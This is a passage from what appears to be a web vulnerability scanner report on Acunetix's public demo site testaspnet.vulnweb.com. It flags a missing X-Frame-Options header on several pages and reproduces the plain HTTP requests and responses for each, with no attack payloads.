href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ads/def.html
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 363 bytes.	GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 246 bytes.	HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Fri, 24 May 2019 07:50:37 GMT Accept-Ranges: bytes ETag: "eb6cf45f512d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 488
Response Body - size: 488 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title></title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"> <meta name="ProgId" content="VisualStudio.HTML"> <meta name="Originator" content="Microsoft Visual Studio .NET 7.1"> </head> <body> <P align="center"><STRONG>Is your website hackable?<BR> check with<BR> <IMG src="acunetix.gif"><BR> Web Vulnerability Scanner</STRONG></P> </body> </html>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13859
Response Body - size: 13,859 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" 